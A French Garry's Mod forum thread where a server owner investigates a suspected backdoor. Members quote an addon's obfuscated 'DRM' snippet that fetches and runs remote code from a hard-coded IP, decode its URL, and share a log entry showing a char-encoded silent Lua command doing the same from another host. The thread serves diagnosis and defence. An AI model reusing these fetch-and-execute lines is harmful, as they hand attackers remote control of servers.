Un backdoor ?

  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Bonsoir,

Un joueur a réussis à trouver le mot de passe de mon serveur et, en tapant son steamid sur google, mince, je tombe sur une conversation mTx.
Je viens de lancer un braxscan mais rien de bien méchant à signaler, le code doit-être obfuscé...
La personne est connu sous le nom de LeFaux, SteamID : STEAM_0:0:210637209 (déjà dans le sourceban)
Ma collection : http://steamcommunity.com/sharedfiles/filedetails/?id=1113410724

D'avance merci,
Cordialement,
xSploit.
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
laisse moi deviné > utilisation du luarun ou exec ?
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Ou puis-je voir ça ?
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
logs
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

Code:
--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
xSploit à dit:
D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

Code:
--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)
LIEN DE L'ADDON
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Tien, le voilà, http://steamcommunity.com/sharedfiles/filedetails/?id=1084512055&searchtext=ATM
Ah, j'ai trouver ça dans mes logs (Willia ANDERSON c'est moi, c'est assez bizard ...)

Code:
(SILENT) William Anderson ran lua: _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,77,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)
ServerLog: [ULX] (SILENT) William Anderson ran lua: _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,77,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)
L 01/12/2018 - 17:51:08: [ULX] (SILENT) William Anderson ran lua: _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,77,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Vous pouvez savoir de quel addon ça vient ? :(
 
Mika Deagle

Mika Deagle

Geek
Messages
221
Score réaction
60
Points
80
xSploit à dit:
D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

Code:
--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)
J'avais aussi vu sa dans le fichier.
 
Mika Deagle

Mika Deagle

Geek
Messages
221
Score réaction
60
Points
80
xSploit à dit:
Vous pouvez savoir de quel addon ça vient ? :(
je pense a cela : http://steamcommunity.com/sharedfiles/filedetails/?id=956800188
Si quelqu'un qui connais mieux que moi peut confirmer !
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
Mika Deagle à dit:
je pense a cela : http://steamcommunity.com/sharedfiles/filedetails/?id=956800188
Si quelqu'un qui connais mieux que moi peut confirmer !
ptdr non
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Mika Deagle à dit:
je pense a cela : http://steamcommunity.com/sharedfiles/filedetails/?id=956800188
Si quelqu'un qui connais mieux que moi peut confirmer !
J'ai dé-compiler ya rien ... @Yoh Sambre ♪ je comptais sur toi pour m'éclairer ;)
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Yoh Sambre ♪ à dit:
j'ai écrit un peu plus haut



j'ai check en gros..
Et donc ? Que dois-je faire ? :x
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
xSploit à dit:
Et donc ? Que dois-je faire ? :x
j'ai envoyer un MP a maks au sujet du panel que l'on connait (il s'agit d'un panel déja spotted) a voir le retour ,

en attendant je peux t'aider a étre un peu plus a l'abri :) (2/3 manips easy a faire)
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
D'accord, j'aimerais virer la backdoor quoi, si tu peux m'aider c'est cool ;)
Es-tu sur que c'est bien cet addon qui est backdoor, parce que jusque la je n'avais aucun problème. (Au passage, lien du profil steam du mec qui backdoor : http://steamcommunity.com/profiles/76561198381540146)
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
xSploit à dit:
D'accord, j'aimerais virer la backdoor quoi, si tu peux m'aider c'est cool ;)
Es-tu sur que c'est bien cet addon qui est backdoor, parce que jusque la je n'avais aucun problème. (Au passage, lien du profil steam du mec qui backdoor : http://steamcommunity.com/profiles/76561198381540146)
go TS de mtx
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Messages
6 527
Score réaction
5 488
Points
1 295
elessaro34

elessaro34

Geek suprême
Messages
271
Score réaction
109
Points
150
Hello, pour le code dans l'ATM c'était à la base un DRM, mais finalement j'ai realease l'ATM donc autant release tout le code avec ^^ Je vais update pour enlever cette ligne
 
  • J'aime
Réactions: Yoh Sambre ♪
Mika Deagle

Mika Deagle

Geek
Messages
221
Score réaction
60
Points
80
  • Banni
BilalPrisel

BilalPrisel

Bambi
Messages
32
Score réaction
-1
Points
35
Parler de panel qu'alors le code est crypté , de vrai codeur qu'ont a la dite donc ! SeemsGood
 
FrenchNeo

FrenchNeo

Psychopathe
Messages
971
Score réaction
204
Points
260
xSploit à dit:
D'accord, je vérifie, par contre j'ai trouvé ça dans un addon de TheElessaro

Code:
--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch("\104\116\116\112\58\47\47\55\57\46\49\51\55\46\53\57\46\49\51\54\47\103\98\95\115\116\97\116\115\47\99\111\114\101\47\115\116\97\103\101\49\46\112\104\112", function(b, l, h, c)
RunString(b)
end)
end)
traduction
Code:
--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch(" http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
end)
 
  • J'aime
Réactions: Yoh Sambre ♪
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Jean Hack à dit:
Désolé c'est moi qui est Backdoor j'aime bien
Ptdr alors c'est quel addon ?
 
  • Banni
BilalPrisel

BilalPrisel

Bambi
Messages
32
Score réaction
-1
Points
35
FrenchNeo à dit:
traduction
Code:
--DRM et stats (enlevez la ligne si vous ne voulez pas apparaitre dans la liste des serveurs qui utilisent cet addon)
http.Fetch("http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
concommand.Add("reload_atm",function()
init()
http.Fetch(" http://79.137.59.136/gb_stats/core/stage1.php", function(b, l, h, c)
RunString(b)
end)
end)
Fake
 
Mika Deagle

Mika Deagle

Geek
Messages
221
Score réaction
60
Points
80
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Du coup, personne n'as vraiment trouvé un addon frauduleux ici : http://steamcommunity.com/sharedfiles/filedetails/?id=1113410724 ?
Au passage, @Yoh Sambre ♪ pourquoi ne pas comparer le workshop du serveur du canadien et le mien ?
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Après discussions avec le gars, il veux ps me dire ce que c'est, et qu'on est à côté de la plaque et que c'est pas un backdoor..
Il veux pas me le dire...
 
  • Banni
BilalPrisel

BilalPrisel

Bambi
Messages
32
Score réaction
-1
Points
35
xSploit à dit:
Après discussions avec le gars, il veux ps me dire ce que c'est, et qu'on est à côté de la plaque et que c'est pas un backdoor..
Il veux pas me le dire...
Peut-être parceque les français sont détestés par les anglais à cause des types comme @Yoh Sambre ♪
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Il vient de me dire qu'il pouvait uniquement trouver les mots de passes (et au passage, askip c'est un "RCE")
 
Dernière édition:
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
xSploit à dit:
Il vient de me dire qu'il pouvait uniquement trouver les mots de passes (et au passage, askip c'est un "RCE")
LeFaux: c'est une 0day MDRR MOI AUSSI IL MA FAIT SA A MON SERV
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Dynastix à dit:
LeFaux: c'est une 0day MDRR MOI AUSSI IL MA FAIT SA A MON SERV
As-tu réussis à corriger le problème ? Après ce qui est bizard c'est que quand je demande qu'il sorte le mot de passe de mon serveur, j'ai des serveurs chelou avec des hooks dans mes logs...
 
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
xSploit à dit:
As-tu réussis à corriger le problème ? Après ce qui est bizard c'est que quand je demande qu'il sorte le mot de passe de mon serveur, j'ai des serveurs chelou avec des hooks dans mes logs...
change ton rcon et enleve la fonction luarun et tout les trucs comme cexec de ton ulx et si ta more materials enleve car ya un backdoor dedans.
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Dynastix à dit:
change ton rcon et enleve la fonction luarun et tout les trucs comme cexec de ton ulx et si ta more materials enleve car ya un backdoor dedans.
Déjà fait.. Il a ressortit mon mdp
 
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
En tous cas, si quelqu'un trouve une solution, je suis preneur !!
 
Malcolm

Malcolm

Psychopathe
Messages
1 096
Score réaction
262
Points
280
J'ai regarder les addons les plus récents de ta collection (Décembre 2017/Janvier 2018) et je n'ai rien vu de suspect que des véhicules.
Dynastix à dit:
change ton rcon et enleve la fonction luarun et tout les trucs comme cexec de ton ulx et si ta more materials enleve car ya un backdoor dedans.
La dernière édition date de 2013
, ça m'étonnerai.
 
Abstract Exo

Abstract Exo

Geek
Messages
180
Score réaction
21
Points
70
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
UP svp
 
  • Banni
BilalPrisel

BilalPrisel

Bambi
Messages
32
Score réaction
-1
Points
35
xSploit à dit:
Arrete de up ton serveur s’est fait hacké par celui qui ta filesteal et tu peut rien faire d’autres.
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
BilalPrisel à dit:
Arrete de up ton serveur s’est fait hacké par celui qui ta filesteal et tu peut rien faire d’autres.
Non, étant que c'est toi le filestealer de mon serveur.. (Le même pseudo qui a upload le filesteal de mon serveur et celui de Yoh Sambre)
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
xSploit à dit:
Non, étant que c'est toi le filestealer de mon serveur.. (Le même pseudo qui a upload le filesteal de mon serveur et celui de Yoh Sambre)
J'ajouterai juste que si des gens sont intéressé pour avoir leur propre serveur sandbox remplis d'exclu incroyable n'attendez plus et contactez moi en mp pour avoir le lien officiel de ASS sur veryLush ! PogChamp
 
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Messages
6 527
Score réaction
5 488
Points
1 295
Yoh Sambre ♪ à dit:
J'ajouterai juste que si des gens sont intéressé pour avoir leur propre serveur sandbox remplis d'exclu incroyable n'attendez plus et contactez moi en mp pour avoir le lien officiel de ASS sur veryLush ! PogChamp
Et ceux qui veulent le côté server contacter moi KappaSeemsGood
 
  • J'aime
Réactions: Yoh Sambre ♪
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Bon, je vois que personne n'est en mesure de m'aider ici..
 
Malcolm

Malcolm

Psychopathe
Messages
1 096
Score réaction
262
Points
280
T'as bien vérifié ton ftp ?
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
Oui ^^
 
  • Initiateur de la discussion
  • Banni
xSploit

xSploit

Geek
Messages
148
Score réaction
16
Points
65
UP svp
 
Discord d'entraide
Rejoignz-nous sur Discord